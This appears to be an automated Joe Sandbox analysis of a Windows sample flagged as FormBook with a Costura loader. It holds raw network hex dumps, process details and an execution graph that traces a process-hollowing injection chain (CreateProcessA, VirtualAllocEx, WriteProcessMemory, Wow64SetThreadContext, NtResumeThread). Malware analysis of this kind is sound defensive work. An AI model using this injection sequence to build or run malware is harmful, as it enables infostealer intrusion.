                                        Access-Control-Allow-Methods: GET, HEAD
                                        Accept-Ranges: bytes
                                        2024-11-25 23:19:50 UTC15846INData Raw: a5 ff d6 8f cd 0e 55 c0 2c eb 72 b6 09 21 0d c9 08 9f d3 a4 ea cb 2d 8b 1a 66 82 0c e3 9e a3 0d 50 f2 93 71 7b 9a 6d bc 9d 9f 21 f3 67 39 7b d8 ec 94 85 d7 3e 1f 50 64 c7 4a bf ab 21 ab c5 71 85 43 99 49 14 41 77 d9 0b b6 ce f4 c0 b5 93 08 63 2e f8 73 b2 1e b7 38 83 f0 03 23 b5 77 a8 df e3 ee 31 09 27 70 9c 33 fc 6b a8 f5 ba 81 8d e5 58 d2 89 86 30 5f 09 9e 61 7a bf ca 2f 9a f8 83 9b b5 8d ac 54 06 d9 2e 64 6f 7e ac 48 b8 68 af f3 23 3a 7a 2c c9 fd 7e cc d4 d3 2c be 4b 7f 59 4d 9d 7e 48 9e 96 fe 48 fa 43 c1 f0 ec a2 8c 3b b0 24 77 b1 b9 cf ef b1 22 ab 30 41 9c b8 7b d6 e9 62 de c8 de af 1a ee 1d e6 15 02 1b 5d 13 ed fa d8 f0 ba fc ff a1 c3 d0 13 bd 75 9f 86 51 72 f9 b6 51 1a 53 f9 c3 5f 45 85 2f 8d 84 16 8b a7 06 da 28 1f 40 3b 6b 97 c9 b3 89 9f 7d c1 24
                                        Data Ascii: U,r!-fPq{m!g9{>PdJ!qCIAwc.s8#w1'p3kX0_az/T.do~Hh#:z,~,KYM~HHC;$w"0A{b]uQrQS_E/(@;k}$
                                        2024-11-25 23:19:50 UTC16384INData Raw: 56 f8 cb ef 74 c9 ca b4 f9 16 42 6a 8f 45 a3 6d 41 30 53 5e 77 35 a6 ee de 70 12 f2 6e ce f6 cd 9d 46 a6 1a bb 6a f6 ae b0 cb b4 5e 7e d5 89 03 b8 45 0c a5 5b 9f 6f 92 56 e7 87 48 ee cb 64 1e 31 a6 a4 23 4a df 2e 30 1e b6 59 0b cb 89 13 0c d7 74 6f dc 90 5c 52 25 ee f5 b1 30 75 b3 d5 a6 d7 87 b5 f3 b2 3b 72 0b 55 aa 8f 79 84 de 94 6f f5 42 36 e7 9e e0 6b 1e 2a 8c 28 2e 98 45 02 b1 b5 33 cb 81 6b 28 c9 7b ef fb 98 90 e5 fd 1e 85 2b 6c 90 58 b3 98 ad b2 cb 6d 8c b7 97 21 be 16 1b 0c bc 4e 98 cc 11 1c 36 d8 15 3c 05 9a 71 59 fe 5e 1d 3d 7b fa 09 63 dc 67 36 3f 69 7f a2 cd 55 c6 7d b9 41 24 0a 44 6d 4b a7 63 14 6b ea 53 e6 36 51 ac 5c 06 2d ff e2 20 54 a2 ac 7a 6e 54 e8 cd 25 ed 1b f3 1c 01 12 f8 3e 0c c0 42 86 4a 77 9a 0b d1 f2 d4 62 50 e1 13 46 86 1f 91 37
                                        Data Ascii: VtBjEmA0S^w5pnFj^~E[oVHd1#J.0Yto\R%0u;rUyoB6k*(.E3k({+lXm!N6<qY^={cg6?iU}A$DmKckS6Q\- TznT%>BJwbPF7
                                        2024-11-25 23:19:50 UTC16384INData Raw: e9 73 32 88 01 b7 d5 fe f2 5a db 76 fc a4 7e a2 e9 37 be b8 8f 7a 95 48 1d e9 70 24 3b 14 3b ad c1 4d 8a 57 a8 2d ab cc da 99 c9 45 ea c8 09 9a 5b 01 7f e1 25 0e 7f 18 01 e0 85 3e 15 be 43 8f a6 7c b2 f0 e7 30 e6 eb 3d 85 04 ae 3f 15 69 15 f0 be 05 50 01 3a 6a 28 44 38 92 d9 9f 63 9a 1d 97 e3 c8 0d ac 5c 9b b6 5f d0 d7 7c ed 53 33 d1 43 49 af e0 3b 9a b5 a9 c5 da 34 b9 29 f6 55 8a a2 e5 71 1a fc 98 96 d0 7b ee bf ab e3 c6 15 5f f9 63 fb 3e 4d 3a 40 0c c7 9b 77 2b f6 c7 1e 66 13 69 88 d5 35 f7 f8 a3 b4 ac ac 28 a4 f6 dc f3 8c 27 a1 c1 dd 9b 6b 9d e8 12 53 79 7a 22 02 7d fe a4 9c c9 48 dc 61 c0 51 d7 59 49 b4 cb 62 bd 60 87 f2 69 80 05 aa 85 fb 6d e8 19 6f 7a d7 69 4b 54 14 b6 9d 8a dc f9 35 07 3b 28 61 16 ec 10 b4 4c f4 ac 3a 9e 6b 99 10 8c d3 d2 9e ae 74
                                        Data Ascii: s2Zv~7zHp$;;MW-E[%>C|0=?iP:j(D8c\_|S3CI;4)Uq{_c>M:@w+fi5('kSyz"}HaQYIb`imoziKT5;(aL:kt
                                        2024-11-25 23:19:50 UTC16384INData Raw: f2 9f fe 75 fb 38 23 52 e4 23 81 b5 53 6d 28 63 68 73 3f d4 be 34 35 15 ee 09 56 d4 24 96 d9 fd 6d 1c 56 b2 86 db 65 cb 62 e8 2a 1a 11 29 c4 6d c2 a3 50 a2 c3 c2 79 b1 42 bc b6 1b 74 34 a7 05 b8 79 78 21 db 8c fb 1e 43 cd 17 b9 79 c3 dd 32 f1 94 3c 47 20 a7 44 a0 4b e8 19 a2 0a 71 1b 1f 4f 1d 64 57 22 ef fa 65 b7 fb 51 90 4f 1f 78 45 4c 18 2e 8b 3f c6 59 c1 05 8e 1c 18 d7 3a 44 c3 10 80 a0 44 6c 2f 0f d1 b2 52 17 0b 2a 55 05 f1 e6 c8 16 36 c8 1a 8c 99 d5 da f0 f3 67 69 0b e4 42 b0 33 39 bc 3c 42 d2 7d 35 23 e6 43 20 15 90 87 a1 a8 47 c2 9d 32 5d 15 1a 73 2c 95 22 63 de d1 ed 16 5b f8 eb 90 1f 44 65 ac 91 c3 1a 91 98 61 d6 47 14 c0 f3 f3 60 89 bb e2 46 41 48 c9 37 42 e0 ba e8 c0 cd cd 46 fe b1 43 a7 a1 f8 df a5 7b dc f8 87 c4 62 23 e1 de 08 ab 22 c6 7d 01
                                        Data Ascii: u8#R#Sm(chs?45V$mVeb*)mPyBt4yx!Cy2<G DKqOdW"eQOxEL.?Y:DDl/R*U6giB39<B}5#C G2]s,"c[DeaG`FAH7BFC{b#"}
                                        2024-11-25 23:19:50 UTC16384INData Raw: 6e e7 fc ca 6d 15 14 07 b3 c0 15 2c 9f 19 b7 6f 16 e6 13 f3 58 59 46 e4 84 8e 03 79 e8 c9 0a bf 80 fc 2c e7 50 30 56 b4 e4 86 fc 80 0c fa 9d 2d 65 ed 43 7d 3d 01 59 f6 ca 96 0b 5a fd 9f 28 a3 80 bd e4 97 47 88 39 83 f9 48 ee 62 34 6c 59 2b 7d bd b6 ba d0 16 8f 2b 21 3e 16 cc cc 18 6e 02 28 36 f9 87 56 53 93 54 a0 c5 2a 76 41 26 a9 83 f7 e0 f7 5e 44 74 b0 0c fc c2 e8 a5 a9 cb 72 47 ee b6 12 7b bc e5 26 34 63 e9 9a de b3 96 89 88 1c cd a5 7e a7 e2 72 0c 39 37 12 6c 76 c2 c5 ca 01 7d 9c 5f ee 91 88 58 40 32 85 15 57 83 8e 61 36 7b dd 5c 41 4a bb ba 06 7e d8 f5 ce 66 94 c2 6a 31 fb 6f f6 3d c8 47 52 a0 e2 74 1e 39 af 36 62 ee 20 04 ed 25 ab 8b a0 27 ca 4c 2a 7c ae 7c 81 f2 4a 26 32 6b 1f 3c 43 19 eb 02 37 dd bd 52 2d f6 7a ba 53 e2 74 43 f8 cd 80 60 39 8f f9
                                        Data Ascii: nm,oXYFy,P0V-eC}=YZ(G9Hb4lY+}+!>n(6VST*vA&^DtrG{&4c~r97lv}_X@2Wa6{\AJ~fj1o=GRt96b %'L*||J&2k<C7R-zStC`9
                                        2024-11-25 23:19:50 UTC16384INData Raw: b3 1e 64 c3 7a d0 e2 80 37 c7 37 3f 01 1d fc fa da ec 7e b2 a9 38 e1 44 ae 72 84 b1 8f b2 22 ec bc a7 eb bf b6 f0 59 5e 4d 75 41 9d 4c 7c 04 f5 4c 52 70 b0 e7 00 ba 70 16 71 00 49 6e 95 0e db 76 fd 2d 92 f6 a1 3e 97 cb 86 2c 24 71 6b 76 76 1a 12 5d 5c ef 48 38 d8 63 de 55 63 33 51 55 77 23 0d a7 df 63 9e 26 3f 9d fa 24 74 84 a2 2a 7e d5 eb d8 04 59 23 04 eb 0e 54 24 52 b8 08 58 14 eb 87 4a 1b e7 b9 f6 14 04 5d 1a 50 61 d5 84 47 2f 7b 32 7f b5 fd 2c 4f 59 a7 fc 70 3e 42 fc 2c 1f b3 0d c2 7f e9 5b 27 d4 c3 b7 74 3c 52 1f 2e 10 41 ed bb 5c 93 55 3a 0a 3d a4 32 be e2 12 54 80 29 35 cd d6 b8 c5 b8 1b 92 ee b1 34 07 b7 b1 f6 b0 1f 8f a8 0a 93 e0 67 5a 40 0b 24 75 fe be f0 73 c4 03 0f 53 51 b8 8c 84 ef 6b 15 3a 4e 10 e3 8c 0f 7e bd 09 48 e7 39 97 5e 15 67 33 ca
                                        Data Ascii: dz77?~8Dr"Y^MuAL|LRppqInv->,$qkvv]\H8cUc3QUw#c&?$t*~Y#T$RXJ]PaG/{2,OYp>B,['t<R.A\U:=2T)54gZ@$usSQk:N~H9^g3
                                        2024-11-25 23:19:50 UTC16384INData Raw: c6 78 3b 94 4b a7 81 b9 9d e5 2a 7a 4e 98 23 c6 29 ef 19 69 76 66 9a d1 82 1c 7b f6 c0 ba 54 37 eb 9d 8c 04 4f 6d 5f cb 30 d9 53 da 17 c7 59 3c 07 fe 9b 9b 4c f1 6e 96 61 f2 cb 45 7e b6 18 25 fd 90 13 00 c7 62 cb 2e 63 85 64 d9 82 40 61 aa fd 21 92 6d 3e 07 c1 8b d2 d2 10 fd 21 90 93 92 1e d3 44 ff 7b a6 3c d2 1c c0 f7 b8 d5 51 0a af 82 df c4 33 b4 c8 55 be b9 94 ab de 2e 2c da ca ae ff 64 96 40 2d 2a 81 a6 4a 47 2b a1 f4 f8 3c f1 94 79 3f 3b c5 94 b6 d3 1d 80 1a 4a db 25 3a 5e 61 9b a2 e9 28 84 39 42 fc 3d 12 9e 4c 66 58 88 05 8b 60 51 28 92 07 1c 69 c3 1b 00 9c 8e 95 b8 c6 ad c0 4e 47 a3 cf 51 58 d3 b8 90 b6 48 3d 08 fd 74 18 45 53 d5 b9 06 85 bb 0d db f5 92 8e 83 9b 78 22 ac a8 08 7c 52 9d 00 40 af e5 ae a0 67 6b 99 46 eb 27 a0 98 43 41 c5 03 9e ea 48
                                        Data Ascii: x;K*zN#)ivf{T7Om_0SY<LnaE~%b.cd@a!m>!D{<Q3U.,d@-*JG+<y?;J%:^a(9B=LfX`Q(iNGQXH=tESx"|R@gkF'CAH
                                        2024-11-25 23:19:50 UTC16384INData Raw: b0 4b a3 f4 4b a6 3d 2b f8 bd cd c5 3b 53 55 7b 3d d5 4c d6 81 40 f1 35 98 69 44 2e 63 e7 ab 34 4d 50 a8 2d 25 b1 00 10 9a cb 00 2f 04 8d ea d2 9f f6 11 b5 a6 f4 9a 2c d0 d9 f8 ad 14 9b 03 54 71 fa 4d f4 a1 bd fa 78 76 89 a0 2d 02 2c 0b c5 a2 de 2e 9d b2 56 fb 7f 38 da dd 24 97 80 fe ef dd e5 e8 c8 95 e5 24 a0 43 b5 6b b9 2c a9 30 b4 e6 08 ca 66 71 6f 94 9a 73 76 a6 65 c6 39 0b 25 06 e8 e3 4c 26 18 2e 4a 52 dd a9 5c 97 26 96 47 10 7b b3 dc 65 ba c4 73 f5 b2 71 1c a0 6c 01 e1 a3 8a a8 c3 66 2a 34 41 a2 7d 3a 36 9e e6 51 b2 99 51 76 af b4 36 3a 22 9b 76 d8 98 9b 9d 3f 87 0b ee d2 69 32 69 78 c6 8b b0 6a eb ba be d0 4a d6 01 ce 6a 8e d8 ea 21 df 70 32 8e 1f 50 be 74 c3 a2 ce a6 3f 91 b0 ec 08 f7 9e d5 62 b8 90 f1 1c 7b 3d 5d ec 21 44 b9 2f 90 db 5c 6a 26 bf
                                        Data Ascii: KK=+;SU{=L@5iD.c4MP-%/,TqMxv-,.V8$$Ck,0fqosve9%L&.JR\&G{esqlf*4A}:6QQv6:"v?i2ixjJj!p2Pt?b{=]!D/\j&
                                        2024-11-25 23:19:50 UTC16384INData Raw: 80 ee 9d 87 ae 6c c0 af ec de 90 db 72 7d 8b aa 6b 8e 61 31 15 99 1c 68 a8 47 49 22 ac 90 2b 23 2c 23 47 02 81 e1 ef 1e 8e a6 fc 77 d5 9d 23 34 e3 e6 ae 71 55 fb da a6 1b 51 07 9f 66 14 6e 51 13 b2 e4 6a 7d e5 db af 5c cb a1 98 26 25 81 d2 78 33 96 09 12 d7 36 b0 66 55 43 f8 0e 01 ad f7 4e c6 9a ff 3b 72 37 de 3b 4b 51 58 fc df 91 27 b2 2c 6d b1 38 70 ed 3c 03 74 c0 f2 11 ba 74 31 8e bb 6f ce 06 7b 78 d5 3c c7 68 4c 4d be 79 c7 71 cb 0b 25 da b5 ae cf 53 2d 21 3d c4 9b c7 e5 9d 5a 5b dd 4e 89 66 15 14 22 6f 10 9c fc 24 f0 55 25 fd ca a8 3c 80 d5 01 f0 ac d3 d8 ce dd ba 7e f8 69 da 62 ba 37 c4 63 fb 2f 46 fc f2 eb 91 c4 df b4 00 19 ca 1b a6 cb 38 6b c2 63 af 4a 29 9c 21 db fd 19 1d 0a 39 a6 fa 61 55 e1 7b f1 ee 1a 35 c2 f3 6e 6b ba 69 be 2c 49 bb d9 e8 fb
                                        Data Ascii: lr}ka1hGI"+#,#Gw#4qUQfnQj}\&%x36fUCN;r7;KQX',m8p<tt1o{x<hLMyq%S-!=Z[Nf"o$U%<~ib7c/F8kcJ)!9aU{5nki,I
                                        2024-11-25 23:19:50 UTC16384INData Raw: de 12 26 f5 17 f5 be b6 54 02 21 83 2f 0b 42 08 79 5e 77 cc 29 18 a0 f8 aa ab be a6 87 49 d2 6e 2b 9a 8f 60 dd c2 26 16 ca 18 a7 78 39 51 8b 66 2c 95 89 e2 f4 60 76 06 d0 d5 55 9c 04 cb 36 0f b6 06 48 2e 49 ee 28 b8 5b 73 b5 c7 1e 8d 60 0c f0 1c 14 ef c1 93 cd 86 e1 a7 6a 60 f5 7c c1 a2 1d 47 2d 36 10 b7 fa 7a e7 b4 2e 2b 59 56 ad 3e ba aa 57 e4 f8 70 c5 40 6c 16 5f e3 f3 08 1c 7a 27 ae 98 0a 34 ba bc f3 82 76 1b 97 60 aa 5c f0 0a 6d 60 9b 15 c7 f4 08 44 14 cb c4 dd 1f f0 6b 3f d4 7f 34 66 02 15 81 06 2d 1d b5 6b 47 59 f3 88 af 81 d0 73 fa 71 4a c2 34 34 f9 8a 74 d5 8d b8 1c d9 41 0e 27 ed 3d 3a 20 bb 45 d7 fe 46 c2 be 1a 5f 4b 06 27 c8 cf e3 12 93 97 00 37 0e ff c6 b2 fc 25 c6 98 ed 03 d7 3c 9a a4 b6 2f f4 48 22 bd 49 d7 35 3c 7c 53 3f 44 60 e2 fc c6 f9
                                        Data Ascii: &T!/By^w)In+`&x9Qf,`vU6H.I([s`j`|G-6z.+YV>Wp@l_z'4v`\m`Dk?4f-kGYsqJ44tA'=: EF_K'7%</H"I5<|S?D`


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:18:19:46
                                        Start date:25/11/2024
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                        Imagebase:0x3a0000
                                        File size:233'472 bytes
                                        MD5 hash:0A089E934EB856C3E809D0FAC53000C7
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3052844352.0000000006AA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3036442391.000000000282A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:18:19:52
                                        Start date:25/11/2024
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                        Imagebase:0x7d0000
                                        File size:233'472 bytes
                                        MD5 hash:0A089E934EB856C3E809D0FAC53000C7
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2500380493.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:11.4%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:2.9%
                                          Total number of Nodes:307
                                          Total number of Limit Nodes:8
                                          execution_graph 57592 dad0b8 57593 dad0fe GetCurrentProcess 57592->57593 57595 dad149 57593->57595 57596 dad150 GetCurrentThread 57593->57596 57595->57596 57597 dad18d GetCurrentProcess 57596->57597 57598 dad186 57596->57598 57599 dad1c3 GetCurrentThreadId 57597->57599 57598->57597 57601 dad21c 57599->57601 57602 69c907e 57603 69c9088 57602->57603 57607 6cde280 57603->57607 57611 6cde270 57603->57611 57604 69c90c6 57608 6cde295 57607->57608 57609 6cde2ab 57608->57609 57615 6cde5d8 57608->57615 57609->57604 57612 6cde275 57611->57612 57613 6cde2ab 57612->57613 57614 6cde5d8 10 API calls 57612->57614 57613->57604 57614->57613 57616 6cde5de 57615->57616 57620 6cdfd58 57616->57620 57625 6cdfd68 57616->57625 57621 6cdfd68 57620->57621 57630 6ce03cf 57621->57630 57634 6ce0407 57621->57634 57626 6cdfd7d 57625->57626 57628 6ce03cf 10 API calls 57626->57628 57629 6ce0407 10 API calls 57626->57629 57627 6cde74a 57628->57627 57629->57627 57631 6ce03ce 57630->57631 57631->57630 57638 6ce0b30 57631->57638 57650 6ce0b21 57631->57650 57635 6ce03ce 57634->57635 57635->57634 57636 6ce0b30 10 API calls 57635->57636 57637 6ce0b21 10 API calls 57635->57637 57636->57635 57637->57635 57639 6ce0b45 57638->57639 57640 6ce0b67 57639->57640 57662 6ce0d75 57639->57662 57667 6ce1725 57639->57667 57672 6ce15b5 57639->57672 57677 6ce0f04 57639->57677 57682 6ce1ee7 57639->57682 57687 6ce14c7 57639->57687 57692 6ce1426 57639->57692 57697 6ce14ad 57639->57697 57702 6ce1072 57639->57702 57640->57631 57651 6ce0b30 57650->57651 57652 6ce0b67 57651->57652 57653 6ce14ad 2 API calls 57651->57653 57654 6ce1426 2 API calls 57651->57654 57655 6ce14c7 2 API calls 57651->57655 57656 6ce1ee7 2 API calls 57651->57656 57657 6ce0f04 2 API calls 57651->57657 57658 6ce15b5 2 API calls 57651->57658 57659 6ce1725 2 API calls 57651->57659 57660 6ce0d75 2 API calls 57651->57660 57661 6ce1072 2 API calls 57651->57661 57652->57631 57653->57652 57654->57652 57655->57652 57656->57652 57657->57652 57658->57652 57659->57652 57660->57652 57661->57652 57663 6ce0d84 57662->57663 57708 6ce8d58 57663->57708 57712 6ce8d60 57663->57712 57664 6ce0c8f 57664->57640 57668 6ce1734 57667->57668 57670 6ce8d58 Wow64SetThreadContext 57668->57670 57671 6ce8d60 Wow64SetThreadContext 57668->57671 57669 6ce0c8f 57669->57640 57670->57669 57671->57669 57673 6ce15bf 57672->57673 57716 6ce9369 57673->57716 57720 6ce9370 57673->57720 57674 6ce0c8f 57674->57640 57678 6ce0f0a 57677->57678 57724 6ce9618 57678->57724 57728 6ce9610 57678->57728 57679 6ce0c8f 57679->57640 57683 6ce1ef6 57682->57683 57685 6ce9618 WriteProcessMemory 57683->57685 57686 6ce9610 WriteProcessMemory 57683->57686 57684 6ce0c8f 57684->57640 57685->57684 57686->57684 57688 6ce14d6 57687->57688 57690 6ce9618 WriteProcessMemory 57688->57690 57691 6ce9610 WriteProcessMemory 57688->57691 57689 6ce0c8f 57689->57640 57690->57689 57691->57689 57693 6ce1433 57692->57693 57732 6ce9c90 57693->57732 57736 6ce9c88 57693->57736 57694 6ce1816 57698 6ce15db 57697->57698 57699 6ce0c8f 57697->57699 57700 6ce9369 VirtualAllocEx 57698->57700 57701 6ce9370 VirtualAllocEx 57698->57701 57699->57640 57700->57699 57701->57699 57703 6ce1078 57702->57703 57740 6ce24d2 57703->57740 57759 6ce2470 57703->57759 57777 6ce2460 57703->57777 57704 6ce10af 57709 6ce8d60 Wow64SetThreadContext 57708->57709 57711 6ce8ded 57709->57711 57711->57664 57713 6ce8da5 Wow64SetThreadContext 57712->57713 57715 6ce8ded 57713->57715 57715->57664 57717 6ce9370 VirtualAllocEx 57716->57717 57719 6ce93ed 57717->57719 57719->57674 57721 6ce93b0 VirtualAllocEx 57720->57721 57723 6ce93ed 57721->57723 57723->57674 57725 6ce9660 WriteProcessMemory 57724->57725 57727 6ce96b7 57725->57727 57727->57679 57729 6ce9660 WriteProcessMemory 57728->57729 57731 6ce96b7 57729->57731 57731->57679 57733 6ce9cd8 NtResumeThread 57732->57733 57735 6ce9d0d 57733->57735 57735->57694 57737 6ce9c90 NtResumeThread 57736->57737 57739 6ce9d0d 57737->57739 57739->57694 57741 6ce2498 57740->57741 57742 6ce24d6 57740->57742 57743 6ce24a9 57741->57743 57795 6ce254e 57741->57795 57799 6ce2972 57741->57799 57803 6ce2f54 57741->57803 57807 6ce28d8 57741->57807 57811 6ce24dc 57741->57811 57815 6ce273c 57741->57815 57819 6ce2dbf 57741->57819 57823 6ce2c3e 57741->57823 57827 6ce2921 57741->57827 57831 6ce24e0 57741->57831 57835 6ce2680 57741->57835 57839 6ce2ee3 57741->57839 57843 6ce2a0b 57741->57843 57847 6ce2a4d 57741->57847 57851 6ce2b4f 57741->57851 57743->57704 57760 6ce2487 57759->57760 57761 6ce24a9 57760->57761 57762 6ce254e 2 API calls 57760->57762 57763 6ce2b4f 2 API calls 57760->57763 57764 6ce2a4d 2 API calls 57760->57764 57765 6ce2a0b 2 API calls 57760->57765 57766 6ce2ee3 2 API calls 57760->57766 57767 6ce2680 2 API calls 57760->57767 57768 6ce24e0 2 API calls 57760->57768 57769 6ce2921 2 API calls 57760->57769 57770 6ce2c3e 2 API calls 57760->57770 57771 6ce2dbf 2 API calls 57760->57771 57772 6ce273c 2 API calls 57760->57772 57773 6ce24dc 2 API calls 57760->57773 57774 6ce28d8 2 API calls 57760->57774 57775 6ce2f54 2 API calls 57760->57775 57776 6ce2972 2 API calls 57760->57776 57761->57704 57762->57761 57763->57761 57764->57761 57765->57761 57766->57761 57767->57761 57768->57761 57769->57761 57770->57761 57771->57761 57772->57761 57773->57761 57774->57761 57775->57761 57776->57761 57778 6ce2470 57777->57778 57779 6ce254e 2 API calls 57778->57779 57780 6ce2b4f 2 API calls 57778->57780 57781 6ce24a9 57778->57781 57782 6ce2a4d 2 API calls 57778->57782 57783 6ce2a0b 2 API calls 57778->57783 57784 6ce2ee3 2 API calls 57778->57784 57785 6ce2680 2 API calls 57778->57785 57786 6ce24e0 2 API calls 57778->57786 57787 6ce2921 2 API calls 57778->57787 57788 6ce2c3e 2 API calls 57778->57788 57789 6ce2dbf 2 API calls 57778->57789 57790 6ce273c 2 API calls 57778->57790 57791 6ce24dc 2 API calls 57778->57791 57792 6ce28d8 2 API calls 57778->57792 57793 6ce2f54 2 API calls 57778->57793 57794 6ce2972 2 API calls 57778->57794 57779->57781 57780->57781 57781->57704 57782->57781 57783->57781 57784->57781 57785->57781 57786->57781 57787->57781 57788->57781 57789->57781 57790->57781 57791->57781 57792->57781 57793->57781 57794->57781 57796 6ce2536 57795->57796 57855 6ce8185 57796->57855 57859 6ce8190 57796->57859 57800 6ce2536 57799->57800 57801 6ce8185 CreateProcessA 57800->57801 57802 6ce8190 CreateProcessA 57800->57802 57801->57800 57802->57800 57804 6ce2536 57803->57804 57805 6ce8185 CreateProcessA 57804->57805 57806 6ce8190 CreateProcessA 57804->57806 57805->57804 57806->57804 57808 6ce2536 57807->57808 57809 6ce8185 CreateProcessA 57808->57809 57810 6ce8190 CreateProcessA 57808->57810 57809->57808 57810->57808 57812 6ce2513 57811->57812 57813 6ce8185 CreateProcessA 57812->57813 57814 6ce8190 CreateProcessA 57812->57814 57813->57812 57814->57812 57816 6ce2536 57815->57816 57817 6ce8185 CreateProcessA 57816->57817 57818 6ce8190 CreateProcessA 57816->57818 57817->57816 57818->57816 57820 6ce2536 57819->57820 57821 6ce8185 CreateProcessA 57820->57821 57822 6ce8190 CreateProcessA 57820->57822 57821->57820 57822->57820 57824 6ce2536 57823->57824 57825 6ce8185 CreateProcessA 57824->57825 57826 6ce8190 CreateProcessA 57824->57826 57825->57824 57826->57824 57828 6ce2536 57827->57828 57829 6ce8185 CreateProcessA 57828->57829 57830 6ce8190 CreateProcessA 57828->57830 57829->57828 57830->57828 57832 6ce2513 57831->57832 57833 6ce8185 CreateProcessA 57832->57833 57834 6ce8190 CreateProcessA 57832->57834 57833->57832 57834->57832 57836 6ce2536 57835->57836 57836->57835 57837 6ce8185 CreateProcessA 57836->57837 57838 6ce8190 CreateProcessA 57836->57838 57837->57836 57838->57836 57840 6ce2536 57839->57840 57841 6ce8185 CreateProcessA 57840->57841 57842 6ce8190 CreateProcessA 57840->57842 57841->57840 57842->57840 57844 6ce2536 57843->57844 57845 6ce8185 CreateProcessA 57844->57845 57846 6ce8190 CreateProcessA 57844->57846 57845->57844 57846->57844 57848 6ce2536 57847->57848 57849 6ce8185 CreateProcessA 57848->57849 57850 6ce8190 CreateProcessA 57848->57850 57849->57848 57850->57848 57852 6ce2536 57851->57852 57853 6ce8185 CreateProcessA 57852->57853 57854 6ce8190 CreateProcessA 57852->57854 57853->57852 57854->57852 57856 6ce8190 CreateProcessA 57855->57856 57858 6ce837c 57856->57858 57860 6ce81f4 57859->57860 57860->57860 57861 6ce8334 CreateProcessA 57860->57861 57862 6ce837c 57861->57862 57863 6ce7728 57864 6ce7776 NtProtectVirtualMemory 57863->57864 57866 6ce77c0 57864->57866 57867 6959c7c 57870 695dbf8 VirtualProtect 57867->57870 57868 6955ba1 57868->57867 57869 6959ca9 57868->57869 57870->57868 57871 daa930 57872 daa93f 57871->57872 57875 daaa28 57871->57875 57880 daaa17 57871->57880 57876 daaa39 57875->57876 57877 daaa5c 57875->57877 57876->57877 57878 daac60 GetModuleHandleW 57876->57878 57877->57872 57879 daac8d 57878->57879 57879->57872 57881 daaa5c 57880->57881 57882 daaa39 57880->57882 57881->57872 57882->57881 57883 daac60 GetModuleHandleW 57882->57883 57884 daac8d 57883->57884 57884->57872 57536 6956f87 57539 695dbf8 57536->57539 57541 695dc1f 57539->57541 57543 695e048 57541->57543 57544 695e090 VirtualProtect 57543->57544 57546 695076d 57544->57546 57555 cdd118 57556 cdd130 57555->57556 57557 cdd18b 57556->57557 57559 695e650 57556->57559 57560 695e678 57559->57560 57563 695eae0 57560->57563 57561 695e69f 57564 695eb0d 57563->57564 57565 695dbf8 VirtualProtect 57564->57565 57567 695eca3 57564->57567 57566 695ec94 57565->57566 57566->57561 57567->57561 57568 69c93ca 57569 69c93d9 57568->57569 57573 6cd2f98 57569->57573 57577 6cd2fa8 57569->57577 57570 69c9417 57574 6cd2fa8 57573->57574 57581 6cd3105 57574->57581 57578 6cd2fbd 57577->57578 57580 6cd3105 2 API calls 57578->57580 57579 6cd2fd3 57579->57570 57580->57579 57583 6cd3127 57581->57583 57582 6cd2fd3 57582->57570 57583->57582 57584 6cd7338 VirtualProtect 57583->57584 57585 6cd7330 VirtualProtect 57583->57585 57584->57583 57585->57583 57586 dad300 DuplicateHandle 57587 dad396 57586->57587 57885 da4c20 57886 da4c2b 57885->57886 57889 da47d0 57886->57889 57890 da47db 57889->57890 57893 da47e0 57890->57893 57892 da4c26 57894 da47eb 57893->57894 57897 da47f0 57894->57897 57896 da4d05 57896->57892 57898 da47fb 57897->57898 57901 da4990 57898->57901 57900 da4de2 57900->57896 57902 da499b 57901->57902 57905 da49c0 57902->57905 57904 da4ef4 57904->57900 57906 da49cb 57905->57906 57909 da7a10 57906->57909 57908 da7cf0 57908->57904 57910 da7a1b 57909->57910 57911 da94da 57910->57911 57913 da9529 57910->57913 57911->57908 57914 da957b 57913->57914 57915 da9586 KiUserCallbackDispatcher 57914->57915 57916 da95b0 57914->57916 57915->57916 57916->57911 57917 dacba0 57919 dacbad 57917->57919 57918 dacbe7 57919->57918 57921 dab400 57919->57921 57922 dab40b 57921->57922 57923 dad8f8 57922->57923 57925 dacd04 57922->57925 57926 dacd0f 57925->57926 57927 da49c0 KiUserCallbackDispatcher 57926->57927 57928 dad967 57927->57928 57928->57923 57547 695ef28 57548 695ef4f 57547->57548 57551 695f030 57548->57551 57552 695f070 VirtualAlloc 57551->57552 57554 695f00b 57552->57554 57588 695654a 57589 695654c 57588->57589 57591 695dbf8 VirtualProtect 57589->57591 57590 695659a 57591->57590

                                          Executed Functions

                                          Function 069CE880 Relevance: 16.2, Strings: 12, Instructions: 1171COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
